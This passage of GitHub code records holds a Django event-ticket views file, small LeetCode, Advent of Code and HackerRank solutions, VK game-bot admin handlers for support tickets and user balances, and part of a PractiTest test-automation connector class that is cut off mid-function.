+{"seq_id":"3730051579","text":"from django.shortcuts import render, redirect\nfrom .models import *\nfrom .models import add_user_to_list_of_attendees\nfrom django.views.generic import ListView, DetailView\nfrom .forms import RegisterForm\nfrom django.contrib.auth import login, authenticate\nfrom django.http import HttpResponseRedirect\nfrom django.core.mail import send_mail\n\ndef home(request):\n    return render(request,'home.html')\n\ndef register(request):\n    if request.method == \"POST\":\n        form = RegisterForm(request.POST)\n        if form.is_valid():\n            user = form.save()\n            user.refresh_from_db()\n            user.profile.age = form.cleaned_data.get('age')\n            user.profile.estado = form.cleaned_data.get('estado')\n            user.profile.empresa = form.cleaned_data.get('empresa')\n            user.save()\n            raw_password = form.cleaned_data.get('password1')\n            user = authenticate(username=user.username, password=raw_password)\n            login(request, user)\n            return redirect(\"/\")\n    else:\n        form = RegisterForm()\n    return render(request,'signup.html',{\"form\":form})\n\n\ndef eventos(request):\n    if request.method == \"GET\":\n        if request.user.is_authenticated:\n            eventos=Evento.objects.all()\n            boletos=Boleto.objects.all()\n            boletos_usuario= Boleto.objects.filter(user=request.user)\n            myList=[]\n            for b in boletos_usuario:\n                myList.append(b.evento.id)\n            \n            return render(request,\"accounts/eventos.html\",{'eventos':eventos , 'boletos':boletos,'myList':myList})\n        else:\n            return redirect(\"/\")\n    \nclass EventListView(ListView):\n    model = Evento\n    template_name = 'accounts/eventos.html'\n    context_object_name = 'eventos'\n\ndef event_add_attendance(request, pk):\n    this_event = Evento.objects.get(pk=pk)\n    user_id=request.user\n    \n    flag = Boleto.objects.filter(evento=this_event,user=user_id).exists()\n    # Reuse the result computed above instead of re-running the same query\n    if not flag:\n        c=str(this_event.siglas)+str(user_id.id)\n        add_user_to_list_of_attendees(self=this_event, user=request.user,codigo=c)\n        boleto = Boleto.objects.filter(evento=this_event,user=user_id)\n        \n        return render(request,\"inscription.html\",{'this_event':this_event,'flag':flag,'boleto':boleto})\n    else:\n        boleto = Boleto.objects.filter(evento=this_event,user=user_id)\n        return render(request,\"inscription.html\",{'this_event':this_event,'flag':flag,'boleto':boleto})\n\nclass EventDetailView(DetailView):\n    model = Evento\n    \n\n\n\ndef register_event(request):\n    if request.method == \"GET\":\n        return render(request,\"register_event.html\")\n","repo_name":"CelisIvan/YOCPLUSPQ2","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
+{"seq_id":"13689453784","text":"from typing import List\n\n\nclass Solution:\n    def convertToTitle(self, n: int) -> str:\n        res = \"\"\n        if n < 26:\n            return chr(n + 64)\n        while n >= 26:\n            n -= 1\n            n, remainder = divmod(n, 26)\n            res = chr(remainder + 65) + res\n        if 0 < n < 26:\n            res = chr(n + 64) + res\n        return res\n\n\na = Solution()\nin_para1 = 52\nin_para2 = -2147483648\nresu = a.convertToTitle(in_para1)\nprint(resu)","repo_name":"VittorioYan/Leetcode-Python","sub_path":"168.py","file_name":"168.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"}
+{"seq_id":"29582409477","text":"import functools\n\n\ndef cmp(l1, l2):\n    if isinstance(l1, int) and isinstance(l2, int):\n        if l1 < l2:\n            return -1\n        if l1 > l2:\n            return 1\n        else:\n            return 0\n    for i in range(max(len(l1), len(l2))):\n        try:\n            i1 = l1[i]\n        except IndexError:\n            return -1\n        try:\n            i2 = l2[i]\n        except IndexError:\n            return 1\n        # check the types\n        if isinstance(i1, int) and isinstance(i2, int):\n            pass\n        elif isinstance(i1, int):\n            i1 = [i1]\n        elif isinstance(i2, int):\n            i2 = [i2]\n        res = cmp(i1, i2)\n        if res == -1:\n            return -1\n        if res == 1:\n            return 1\n    return 0\n\n\ndef task1(input_):\n    with open(input_) as fh:\n        lines = fh.read().splitlines()\n\n    indices = []\n    i = 1\n    candidates = []\n    for line in lines:\n        if not line:\n            if cmp(candidates[0],
candidates[1]) == -1:\n indices.append(i)\n i += 1\n candidates = []\n continue\n candidates.append(eval(line))\n if cmp(candidates[0], candidates[1]) == -1:\n indices.append(i)\n\n return sum(indices)\n\n\ndef task2(input_):\n with open(input_) as fh:\n lines = fh.read().splitlines()\n\n packets = []\n for line in lines:\n if not line:\n continue\n packets.append(eval(line))\n packets.append([[2]])\n packets.append([[6]])\n\n packets.sort(key=functools.cmp_to_key(cmp))\n i = packets.index([[2]]) + 1\n j = packets.index([[6]]) + 1\n return i * j\n\n\nassert task1('test_input.txt') == 13\nprint(task1('input.txt'))\n\nassert task2('test_input.txt') == 140\nprint(task2('input.txt'))\n","repo_name":"venthur/aoc","sub_path":"2022/13/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"40057121607","text":"# Enter your code here. Read input from STDIN. Print output to STDOUT\nimport sys \n\nn = int(input())\nphonebook = dict()\n\ndef check_key(dict, key):\n if key in dict:\n print(\"{}={}\".format(key, dict[key]))\n # print(key, dict[key])\n else:\n print(\"Not found\")\n\nfor _ in range(0,n):\n name, phonenumber = input().split()\n phonebook[name] = phonenumber\n\nwhile True: \n try:\n key =input()\n check_key(phonebook,key)\n except EOFError:\n break\n","repo_name":"mirianfsilva/code-challenges","sub_path":"30 Days of Code/day08-dictionaries_and_maps.py","file_name":"day08-dictionaries_and_maps.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"26205418366","text":"import json\nimport random\nfrom datetime import datetime\n\nfrom tortoise.exceptions import DoesNotExist\nfrom vkbottle import Keyboard\nfrom vkbottle.bot import Message\nfrom vkbottle.framework.labeler import BotLabeler\n\nfrom config import admin_list, bot, ADMIN_GRADES, USER_STATUSES\nfrom menu.utils import generate_choice_keyboard_with_pagination\nfrom users.handlers import start\nfrom users.models import UserModel\nfrom users.utils import get_clickable_user_name\nfrom .models import QuestionModel\nfrom .keyboards import admin_menu_keyboard, support_menu_keyboard, back_to_support_menu_keyboard, back_to_questions_list\nfrom .states import UnansweredQuestionsState, AnsweredQuestionsState\n\nbl = BotLabeler()\n\n\n@bl.private_message(payload={'menu': 'admin'})\nasync def open_admin_menu(message: Message):\n await message.answer('🗝 Открываю админ панель', keyboard=admin_menu_keyboard)\n\n\n@bl.private_message(payload={'admin': 'admin_list'})\nasync def show_admin_list(message: Message):\n text = '📑 Список администраторов\\n\\n'\n for vk_id, status in admin_list.storage.items():\n text += f'{ADMIN_GRADES[status][\"emoji\"]} {status} - {await get_clickable_user_name(vk_id)}\\n'\n await message.answer(text, keyboard=admin_menu_keyboard)\n\n\n@bl.private_message(payload={'admin': 'support'})\nasync def show_support_menu(message: Message):\n await message.answer('☎ Открываю меню технической поддержки', keyboard=support_menu_keyboard)\n\n\n@bl.private_message(payload={'support': 'unanswered'})\nasync def show_unanswered_questions(message: Message, questions: list = None, page_number: int = 0):\n text = f'📃 Список открытых обращений | Страница {page_number + 1}'\n\n if not questions:\n questions = await QuestionModel.filter(answer=None)\n number_of_questions = len(questions)\n\n if not number_of_questions:\n 
return await message.answer(\n            '😕 Список обращений пуст',\n            keyboard=support_menu_keyboard\n        )\n\n    questions_ids = []\n    for q in questions[page_number * 3:page_number * 3 + 3]:\n        questions_ids.append(q.pk)\n        text += f'\\n\\n🔹№{q.pk}\\n' \\\n                f'💬 {q.text}\\n' \\\n                f'👤 Отправитель: {await get_clickable_user_name((await q.from_user).vk_id)}'\n\n    kb = generate_choice_keyboard_with_pagination(\n        numbers=questions_ids,\n        prev_page=(page_number > 0),\n        next_page=True if number_of_questions - (page_number * 3 + 3) > 0 else False,\n        back_label='◀⁉ Обращения'\n    )\n    await message.answer(text, keyboard=kb)\n    await bot.state_dispenser.set(\n        message.from_id,\n        UnansweredQuestionsState.SHOW_UNANSWERED_QUESTIONS,\n        questions=questions,\n        number_of_questions=number_of_questions,\n        current_page=page_number,\n        keyboard=kb\n    )\n\n\n@bl.private_message(state=UnansweredQuestionsState.SHOW_UNANSWERED_QUESTIONS)\nasync def choose_question_to_answer(message: Message):\n    state_payload = message.state_peer.payload\n    if not message.payload:\n        return await message.answer(\n            message='❗ Некорректный ввод!',\n            keyboard=state_payload['keyboard']\n        )\n\n    choice = json.loads(message.payload)['choice']\n    if choice == 'back':\n        await bot.state_dispenser.delete(message.from_id)\n        await show_support_menu(message)\n    elif choice == 'prev_page':\n        await show_unanswered_questions(\n            message,\n            questions=state_payload['questions'],\n            page_number=state_payload['current_page'] - 1\n        )\n    elif choice == 'next_page':\n        await show_unanswered_questions(\n            message,\n            questions=state_payload['questions'],\n            page_number=state_payload['current_page'] + 1\n        )\n    else:\n        await bot.state_dispenser.set(\n            message.from_id,\n            UnansweredQuestionsState.ANSWER_QUESTION,\n            question_id=choice\n        )\n        await message.answer(\n            f'📞 Для ответа выбран вопрос №{choice}\\n\\n'\n            f'❗ Напишите ответ на вопрос или воспользуйтесь кнопкой, чтобы вернуться в меню тех.поддержки',\n            keyboard=back_to_support_menu_keyboard\n        )\n\n\n@bl.private_message(state=UnansweredQuestionsState.ANSWER_QUESTION, text='<text>')\nasync def answer_question(message: Message, text=None):\n    if text == '◀☎ Обращения':\n        await bot.state_dispenser.delete(message.from_id)\n        await show_support_menu(message)\n    elif len(text) > 512:\n        await message.answer(\n            '❗ Длина ответа не должна превышать 512 символов!',\n            keyboard=back_to_support_menu_keyboard\n        )\n    else:\n        question = await QuestionModel.get(pk=message.state_peer.payload['question_id'])\n        question.answer = text\n        question.answered_by = await UserModel.get(vk_id=message.from_id)\n        question.answered_at = datetime.now()\n        await question.save(update_fields=['answer', 'answered_by_id', 'answered_at'])\n        await bot.state_dispenser.delete(message.from_id)\n        await message.answer('✔ Ответ успешно отправлен!', keyboard=support_menu_keyboard)\n\n        await bot.api.messages.send(\n            user_id=(await question.from_user).vk_id,\n            random_id=random.randint(1, 2 ** 32),\n            message='✨ Пришел ответ от тех.поддержки на ваш вопрос!\\n\\n'\n                    f'💬 Текст ответа: {text}\\n👔 Отправитель: {await get_clickable_user_name(message.from_id)}'\n        )\n\n\n@bl.private_message(payload={'support': 'answered'})\nasync def show_answered_questions(message: Message, questions: list = None, page_number: int = 0):\n    text = f'📃 Список закрытых обращений | Страница {page_number + 1}'\n\n    if not questions:\n        questions = await QuestionModel.exclude(answer=None)\n    number_of_questions = len(questions)\n\n    if not number_of_questions:\n        return await message.answer(\n            '😕 Список обращений пуст',\n            keyboard=support_menu_keyboard\n        )\n\n    questions_ids = []\n    for q in questions[page_number * 3:page_number * 3 + 3]:\n        questions_ids.append(q.pk)\n        text += f'\\n\\n🔹 Обращение №{q.pk}\\n' \\\n                f'💬 Текст обращения: {q.text}\\n' \\\n                f'👤 Отправил: {await get_clickable_user_name((await q.from_user).vk_id)}\\n' \\\n                f'👔 Ответил: {await get_clickable_user_name((await q.answered_by).vk_id)}'\n\n    kb = generate_choice_keyboard_with_pagination(\n        numbers=questions_ids,\n        prev_page=(page_number > 0),\n        next_page=True if number_of_questions - (page_number * 3 + 3) > 0 else False,\n        back_label='◀⁉ Обращения'\n    )\n    await message.answer(text, keyboard=kb)\n    await bot.state_dispenser.set(\n        message.from_id,\n        AnsweredQuestionsState.SHOW_ANSWERED_QUESTIONS,\n        questions=questions,\n        number_of_questions=number_of_questions,\n        current_page=page_number,\n        keyboard=kb\n    )\n\n\n@bl.private_message(state=AnsweredQuestionsState.SHOW_ANSWERED_QUESTIONS)\nasync def choose_question_to_get_info(message: Message):\n    state_payload = message.state_peer.payload\n    if not message.payload:\n        return await message.answer(\n            message='❗ Некорректный ввод!',\n            keyboard=state_payload['keyboard']\n        )\n\n    choice = json.loads(message.payload)['choice']\n    if choice == 'back':\n        await bot.state_dispenser.delete(message.from_id)\n        await show_support_menu(message)\n    elif choice == 'current_page':\n        await show_answered_questions(\n            message,\n            questions=state_payload['questions'],\n            page_number=state_payload['current_page']\n        )\n    elif choice == 'prev_page':\n        await show_answered_questions(\n            message,\n            questions=state_payload['questions'],\n            page_number=state_payload['current_page'] - 1\n        )\n    elif choice == 'next_page':\n        await show_answered_questions(\n            message,\n            questions=state_payload['questions'],\n            page_number=state_payload['current_page'] + 1\n        )\n    else:\n        question = await QuestionModel.get(pk=choice)\n\n        await message.answer(\n            f'📑 Детальная информация об обращении №{choice}\\n\\n'\n            f'💬 Текст обращения: {question.text}\\n'\n            f'👤 Отправил: {await get_clickable_user_name((await question.from_user).vk_id)}\\n'\n            f'🕐 Время отправки: {question.created_at.strftime(\"%X %x\")}\\n\\n'\n            f'💬 Текст ответа: {question.answer}\\n'\n            f'👔 Ответил: {await get_clickable_user_name((await question.answered_by).vk_id)}\\n'\n            f'🕗 Время ответа: {question.answered_at.strftime(\"%X %x\")}\\n\\n'\n            '❗ Чтобы вернуться назад воспользуйтесь кнопкой',\n            keyboard=back_to_questions_list\n        )\n\n\n@bl.private_message(payload={'support': 'answered_by_me'})\nasync def show_questions_answered_by_me(message: Message):\n    questions = await QuestionModel.filter(\n        answer__isnull=False,\n        answered_by=await UserModel.get(\n            vk_id=message.from_id\n        )\n    )\n    await show_answered_questions(message, questions)\n\n\n@bl.private_message(payload={'admin': 'stats'})\nasync def show_admin_stats(message: Message):\n    user = await UserModel.get(vk_id=message.from_id)\n    questions = await QuestionModel.filter(answered_by=user.pk).count()\n    await message.answer(\n        f'📉 Статистика {await get_clickable_user_name(message.from_id)}\\n\\n'\n        f'{ADMIN_GRADES[user.status][\"emoji\"]} Админ-статус: {user.status}\\n'\n        f'☎ Кол-во ответов на обращения: {questions}\\n',\n        keyboard=admin_menu_keyboard\n    )\n\n\n@bl.private_message(payload={'admin': 'commands'})\nasync def show_admin_commands_list(message: Message):\n    admin = await UserModel.get(vk_id=message.from_id)\n    admin_lvl = ADMIN_GRADES[admin.status]['lvl']\n\n    text = ''\n    for grade in ADMIN_GRADES.values():\n        if grade['lvl'] <= admin_lvl:\n            for command in grade['commands']:\n                text += f'\\n{command}'\n\n    await message.answer(\n        f'🛠 Список доступных команд\\n{text}' if text else '😕 Для вас нет доступных команд',\n        keyboard=admin_menu_keyboard\n    )\n\n\n@bl.private_message(text='/setstatus <vk_id> <lvl>')\nasync def set_user_status(message: Message, vk_id: str = None, lvl: str = None):\n    appointing_admin = await UserModel.get(vk_id=message.from_id)\n    if appointing_admin.status == 'Пользователь':\n        return await start(message)\n\n    appointing_admin_lvl = ADMIN_GRADES[appointing_admin.status]['lvl']\n\n    if not vk_id.isdigit() or not lvl.isdigit() or '0' in (vk_id, lvl):\n        return await message.answer(\n            '❗ Некорректный ввод! ID пользователя и уровень должны быть положительными числами!',\n            keyboard=admin_menu_keyboard\n        )\n    vk_id, lvl = int(vk_id), int(lvl)\n\n    if vk_id == message.from_id:\n        return await message.answer(\n            '❗ Некорректный ввод! Вы не можете изменить свой статус!',\n            keyboard=admin_menu_keyboard\n        )\n\n    try:\n        appointee = await UserModel.get(vk_id=vk_id)\n    except DoesNotExist:\n        return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n    appointee_lvl = ADMIN_GRADES.get(appointee.status)\n    if appointee_lvl is None:\n        appointee_lvl = 0\n\n    if appointee_lvl >= appointing_admin_lvl or appointing_admin_lvl <= lvl:\n        return await message.answer('❗ У вас недостаточно прав!', keyboard=admin_menu_keyboard)\n\n    if appointee_lvl == lvl:\n        return await message.answer(\n            '❗ Пользователь уже имеет указанный статус!',\n            keyboard=admin_menu_keyboard\n        )\n\n    appointee.status = USER_STATUSES[lvl]\n    await appointee.save(update_fields=['status'])\n\n    if lvl > 1:\n        admin_list.set(vk_id, appointee.status)\n    else:\n        admin_list.delete(vk_id)\n\n    await message.answer(\n        f'✔ Вы изменили статус пользователя {await get_clickable_user_name(vk_id)} на «{appointee.status}»!',\n        keyboard=admin_menu_keyboard\n    )\n\n    emoji = '⏫' if appointee_lvl < lvl else '⏬'\n    await bot.api.messages.send(\n        user_id=vk_id,\n        random_id=random.randint(1, 2 ** 32),\n        message=f'{emoji} {appointing_admin.status} {await get_clickable_user_name(message.from_id)} '\n                f'изменил ваш статус на «{appointee.status}»!'\n    )\n\n\n@bl.private_message(text='/givemoney <vk_id> <money>')\nasync def give_money_to_user(message: Message, vk_id: str = None, money: str = None):\n    admin = await UserModel.get(vk_id=message.from_id)\n\n    if admin.status == 'Пользователь':\n        return await start(message)\n\n    if not vk_id.isdigit() or not money.isdigit() or '0' in (vk_id, money):\n        return await message.answer(\n            '❗ Некорректный ввод! ID пользователя и сумма должны быть положительными числами!',\n            keyboard=admin_menu_keyboard\n        )\n    vk_id, money = int(vk_id), int(money)\n\n    try:\n        recipient = await UserModel.get(vk_id=vk_id)\n    except DoesNotExist:\n        return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n\n    if admin.status not in ('Гл.Администратор', 'Основатель'):\n        return await message.answer(\n            '❗ У вас недостаточно прав! Данной командой может воспользоваться только '\n            'пользователь со статусом «Гл.Администратор» или «Основатель»!',\n            keyboard=admin_menu_keyboard\n        )\n\n    recipient.balance += money\n    await recipient.save(update_fields=['balance'])\n\n    await message.answer(\n        f'✔ Баланс пользователя {await get_clickable_user_name(recipient.vk_id)} успешно пополнен на ${money}!',\n        keyboard=admin_menu_keyboard\n    )\n\n    await bot.api.messages.send(\n        user_id=vk_id,\n        random_id=random.randint(1, 2 ** 32),\n        message=f'💸 {admin.status} {await get_clickable_user_name(message.from_id)} '\n                f'пополнил ваш баланс на ${money}!'\n    )\n\n\n@bl.private_message(text='/setmoney <vk_id> <money>')\nasync def set_money_for_user(message: Message, vk_id: str = None, money: str = None):\n    admin = await UserModel.get(vk_id=message.from_id)\n\n    if admin.status == 'Пользователь':\n        return await start(message)\n\n    if not vk_id.isdigit() or not money.isdigit() or '0' in (vk_id, money):\n        return await message.answer(\n            '❗ Некорректный ввод! ID пользователя и сумма должны быть положительными числами!',\n            keyboard=admin_menu_keyboard\n        )\n    vk_id, money = int(vk_id), int(money)\n\n    try:\n        recipient = await UserModel.get(vk_id=vk_id)\n    except DoesNotExist:\n        return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n\n    if admin.status not in ('Гл.Администратор', 'Основатель'):\n        return await message.answer(\n            '❗ У вас недостаточно прав! Данной командой может воспользоваться только '\n            'пользователь со статусом «Гл.Администратор» или «Основатель»!',\n            keyboard=admin_menu_keyboard\n        )\n\n    recipient.balance = money\n    await recipient.save(update_fields=['balance'])\n\n    await message.answer(\n        f'✔ Баланс пользователя {await get_clickable_user_name(recipient.vk_id)} успешно изменен на ${money}!',\n        keyboard=admin_menu_keyboard\n    )\n\n    await bot.api.messages.send(\n        user_id=vk_id,\n        random_id=random.randint(1, 2 ** 32),\n        message=f'💵 {admin.status} {await get_clickable_user_name(message.from_id)} '\n                f'изменил ваш баланс на ${money}!'\n    )\n\n\n@bl.private_message(text='/del <vk_id>')\nasync def del_user_account(message: Message, vk_id: str = None):\n    admin = await UserModel.get(vk_id=message.from_id)\n\n    if admin.status == 'Пользователь':\n        return await start(message)\n\n    if not vk_id.isdigit():\n        return await message.answer(\n            '❗ Некорректно введен ID пользователя!',\n            keyboard=admin_menu_keyboard\n        )\n    vk_id = int(vk_id)\n\n    try:\n        user = await UserModel.get(vk_id=vk_id)\n    except DoesNotExist:\n        return await message.answer('❗ Указанный пользователь не зарегистрирован!')\n\n    if admin.status != 'Основатель':\n        return await message.answer(\n            '❗ У вас недостаточно прав! Данной командой может воспользоваться только '\n            'пользователь со статусом «Основатель»!',\n            keyboard=admin_menu_keyboard\n        )\n\n    await user.delete()\n\n    await message.answer(\n        f'✔ Аккаунт пользователя {await get_clickable_user_name(user.vk_id)} удалён!',\n        keyboard=admin_menu_keyboard\n    )\n\n    await bot.api.messages.send(\n        user_id=vk_id,\n        random_id=random.randint(1, 2 ** 32),\n        message=f'❗❌ {admin.status} {await get_clickable_user_name(message.from_id)} удалил ваш аккаунт!',\n        keyboard=Keyboard()\n    )\n    ","repo_name":"profatsky/vk-game-bot","sub_path":"src/admin/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":18784,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"30"}
+{"seq_id":"73605890963","text":"import datetime\nimport time\nfrom enum import Enum\nimport json\nfrom connector.static.core import static_methods\nfrom connector.static.core.aws_sqs_pusher import SQSPusher\n\n\nclass BasePractiTest:\n    WAIT_EXPONENTIAL_MULTIPLIER = 10000\n    WAIT_EXPONENTIAL_MAX = 60000\n    \"\"\"\n    Initializes the BasePractiTest class with various configurations and settings.\n\n    :param pt_username: PractiTest username.\n    :param pt_token: PractiTest API token.\n    :param access_key: AWS access key for the user.\n    :param secret_key: AWS secret key for the user.\n    :param project_name: Name of the project in PractiTest.\n    :param practitest_project_id: ID of the project in PractiTest.\n    :param practitest_trigger_filter_id_list: List of filter IDs in PractiTest to trigger tests.\n    :param practitest_execute_automated: Flag to determine if automated tests should be executed.\n    :param practitest_automation_run_only: Filter tests to be executed by their statuses.\n    :param processed_field_id: Field ID for the processed field in PractiTest.\n    :param processed_field_value: Value for the processed field in PractiTest.\n    :param practitest_automation_trigger: Trigger for automation in PractiTest.\n    :param practitest_automation_trigger_value: Value for the automation trigger in PractiTest.\n    :param practitest_aws_instance_type: Type of AWS instance to be used.\n    :param practitest_debug: Debug flag, when True, the spot will not be terminated.\n    :param execution_type: Type of execution to be performed.\n    :param sync_exec: Flag to determine if execution should be synchronous.\n    :param block: Block parameter (purpose to be defined based on code context).\n    :param block_id: ID for the block.\n    \"\"\"\n\n    def __init__(self, pt_username,\n                 pt_token,\n                 access_key,\n                 secret_key,\n                 project_name,\n                 practitest_project_id,\n                 practitest_trigger_filter_id_list=None,\n                 practitest_execute_automated=None,\n                 practitest_automation_run_only=None,\n                 processed_field_id=None,\n                 processed_field_value=None,\n                 practitest_automation_trigger=None,\n                 practitest_automation_trigger_value=None,\n                 practitest_aws_instance_type=None,\n                 practitest_debug=None,\n                 execution_type=None,\n                 sync_exec=None,\n                 block=None,\n                 block_id=None,\n                 ):\n        self.block = block\n        self.block_id = block_id\n        # PractiTest fields ID\n        self.PRACTITEST_USER_NAME = pt_username\n        self.PRACTITEST_API_TOKEN = pt_token\n        self.AWS_ACCESS_KEY = access_key\n        self.AWS_SECRET_KEY = secret_key\n        self.PROJECT_NAME = project_name\n        self.PRACTITEST_PROJECT_ID = practitest_project_id\n        self.PRACTITEST_TRIGGER_FILTER_ID_LIST = practitest_trigger_filter_id_list\n        self.PRACTITEST_EXECUTE_AUTOMATED = practitest_execute_automated\n        self.PRACTITEST_AUTOMATION_RUN_ONLY = practitest_automation_run_only\n        self.PROCESSED_FIELD_ID = processed_field_id
\n        self.PROCESSED_FIELD_VALUE = processed_field_value\n        self.PRACTITEST_AWS_INSTANCE_TYPE = practitest_aws_instance_type\n        self.PRACTITEST_DEBUG = practitest_debug\n        self.EXECUTION_TYPE = execution_type\n        self.SYNCHRONOUS_EXECUTION = sync_exec\n\n        # Trigger fields\n        self.PRACTITEST_AUTOMATION_TRIGGER = practitest_automation_trigger\n        self.PRACTITEST_AUTOMATION_TRIGGER_VALUE = practitest_automation_trigger_value\n\n        # PractiTest API URLs\n        self.BASE_URL = \"https://api.practitest.com/api/v2/projects/\" + self.PRACTITEST_PROJECT_ID\n        self.RUNS_URI = f'{self.BASE_URL}/runs.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n        self.INSTANCE_URI = f'{self.BASE_URL}/instances.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n        self.SETS_URI = f'{self.BASE_URL}/sets.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n        self.SPECIFIC_SET_URI = f'{self.BASE_URL}/sets/YOUR_SET_ID.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n        self.CLONE_TEST_SET = f'{self.BASE_URL}/sets/YOUR_SET_ID/clone.json?developer_email={self.PRACTITEST_USER_NAME}&api_token={self.PRACTITEST_API_TOKEN}'\n        self.HEADERS = {\n            'Content-Type': 'application/json',\n            'Connection': 'close'\n        }\n\n    class TestStatusEnum(Enum):\n        def __str__(self):\n            return str(self.value)\n\n        PASSED = 'PASSED'\n        FAILED = 'FAILED'\n        BLOCKED = 'BLOCKED'\n        NO_RUN = 'NO RUN'\n        N_A = 'N/A'\n\n\n    def log(self, message):\n        \"\"\"\n        Logs the provided message, storing it in the DB\n        :param message: The message to be logged.\n        \"\"\"\n        from connector.models import Block, LogEntry  # Import the Block and LogEntry models\n        import datetime\n\n        timestamp = datetime.datetime.now()\n        log_with_timestamp = f\"[{timestamp}] {message}\"\n\n        if self.block_id:\n            block = Block.objects.get(pk=self.block_id)  # Fetch the block using block_id\n            LogEntry.objects.create(block=block, content=log_with_timestamp, timestamp=timestamp)\n\n\n    def get_dict_of_tests_objects(self, filter_test_sets_list):\n        \"\"\"\n        Fetches a list of tests based on their status from the test set labeled as \"Automation Run Only\"\n        and returns this list along with a list of Practitest test objects.\n\n        Parameters:\n        - filter_test_sets_list (list): A list of test sets to filter from.\n\n        Returns:\n        - list: A list of dictionaries where each dictionary represents a test containing:\n            - project_name (str): Name of the project.\n            - test_id (str): Display ID of the test.\n            - test_instance (str): Unique ID representing the test instance.\n            - test_name (str): Name of the test.\n            - test_set_id (str): Display ID of the test set.\n            - test_set_name (str): Name of the test set.\n            - project_pt_id (str): Project ID from Practitest.\n            - execution_session_id (str): Timestamp indicating the current execution session.\n            - automation_run_only (str): Indicates if the test is for automation run only.\n            - aws_instance_type (str): Specifies the AWS instance type.\n            - debug (bool): Indicates if the test is in debug mode.\n            - execution_type (str): Type of execution for the test.\n            - sync_exec (bool): Indicates if the execution is synchronous.\n\n        - list: A list of Practitest test objects.\n\n        Raises:\n        - Exception: If there's an error parsing the test set or test attributes.\n\n        Notes:\n        - If no test set is found under the specified filter, a warning will be logged.\n        \"\"\"\n        initial_tests_list = [] #Contains all the tests to be executed (pushed to queue)\n        if not filter_test_sets_list:\n            self.log(f'Warning: No test set found under {self.PRACTITEST_TRIGGER_FILTER_ID_LIST} filter, but should be found')\n            return [], []  # keep the (tests, objects) tuple shape for callers\n\n        filter_test_sets_dict = self.convert_test_set_obj_list_to_dict_set_id_as_key(filter_test_sets_list)\n        tests = self.get_list_of_tests_by_status(filter_test_sets_dict)\n        try:\n            for test in tests:\n                test_set = filter_test_sets_dict[str(test['attributes']['set-id'])]\n                test_set_attributes = test_set['attributes']\n                test_set_custom_fields = test_set_attributes['custom-fields']\n                test_dict = {}\n                test_attributes = test['attributes']\n                test_custom_fields = test['attributes']['custom-fields']\n                test_dict['project_name'] = self.PROJECT_NAME\n                test_dict['test_id'] = str(test_attributes['test-display-id'])\n                test_dict['test_instance'] = str(test['id']) #Unique test instance id, reporting back to PractiTest\n                test_dict['test_name'] = str(test_attributes['name']).replace(\"'\", \"\").replace('\"', '').replace(',', '')\\\n                    .replace('(', '').replace(')', '').replace('<', '').replace('>', '').replace('!', '').replace('@', '')\\\n                    .replace('#', '').replace('*', '')\n                test_dict['test_set_id'] = str(test_set_attributes['display-id'])\n                test_dict['test_set_name'] = str(test_set_attributes['name'])\n                test_dict['project_pt_id'] = str(test_attributes['project-id'])\n                test_dict['execution_session_id'] = str(time.time()).replace(\".\",\"\") #Timestamp for current execution, relevant for sync execution\n                test_dict['automation_run_only'] = str(test_set_custom_fields[self.PRACTITEST_AUTOMATION_RUN_ONLY])\n                test_dict['aws_instance_type'] = str(test_set_custom_fields[self.PRACTITEST_AWS_INSTANCE_TYPE])\n                test_dict['debug'] = self.get_prioritized_value(self.PRACTITEST_DEBUG, test_set, test, is_boolean=True)\n                test_dict['execution_type'] = str(self.EXECUTION_TYPE)\n                test_dict['sync_exec'] = static_methods.try_to_get_from_dict(test_set_custom_fields, self.SYNCHRONOUS_EXECUTION, is_boolean=True)\n                initial_tests_list.append(test_dict)\n        except:\n            self.log('Error: failed to parse test set/test attributes')\n        return initial_tests_list, tests\n\n\n    def get_prioritized_value(self, dict_value, test_set, test, is_boolean=False):\n        \"\"\"\n        Retrieve a prioritized value from either 'test', 'testset', or 'default' keys.\n\n        This function tries to extract a value based on conditions specified in the input dict_value.\n        It first checks the 'test' key, then 'testset', and finally the 'default' key. If none\n        of these keys provide a value, an exception is raised.\n\n        Parameters:\n        - dict_value (dict): Dictionary containing keys ('test', 'testset', 'default') to specify the desired value.\n        - test_set (dict): Dictionary containing the attributes of the test set.\n        - test (dict): Dictionary containing the attributes of the test.\n        - is_boolean: If true, it will convert 'yes'/'no' to 'true'/'false' string\n\n        Returns:\n        - value: The extracted value based on the conditions in dict_value.\n\n        Raises:\n        - ValueError: If the desired value cannot be retrieved.\n        \"\"\"\n\n        test_set_attributes = test_set['attributes']\n        test_set_custom_fields = test_set_attributes['custom-fields']\n        test_attributes = test['attributes']\n        test_custom_fields = test_attributes['custom-fields']\n\n\n        # Helper function to extract value based on field name and source data\n        def extract_value(field, attributes, custom_fields):\n            if '---f-' in field:\n                val = custom_fields[field]\n            else:\n                val = attributes[field]\n\n            # Handle boolean conversion\n            if is_boolean:\n                if val == 'yes':\n                    return 'true'\n                elif val == 'no':\n                    return 'false'\n            return val\n\n        try:\n            # Check for 'test' key\n            if 'test' in dict_value:\n                return str(extract_value(dict_value['test'], test_attributes, test_custom_fields))\n        except:\n            pass\n        try:\n            # Check for 'testset' key\n            if 'testset' in dict_value:\n                return str(extract_value(dict_value['testset'], test_set_attributes, test_set_custom_fields))\n        except:\n            pass\n\n        # Check for 'default' key\n        if 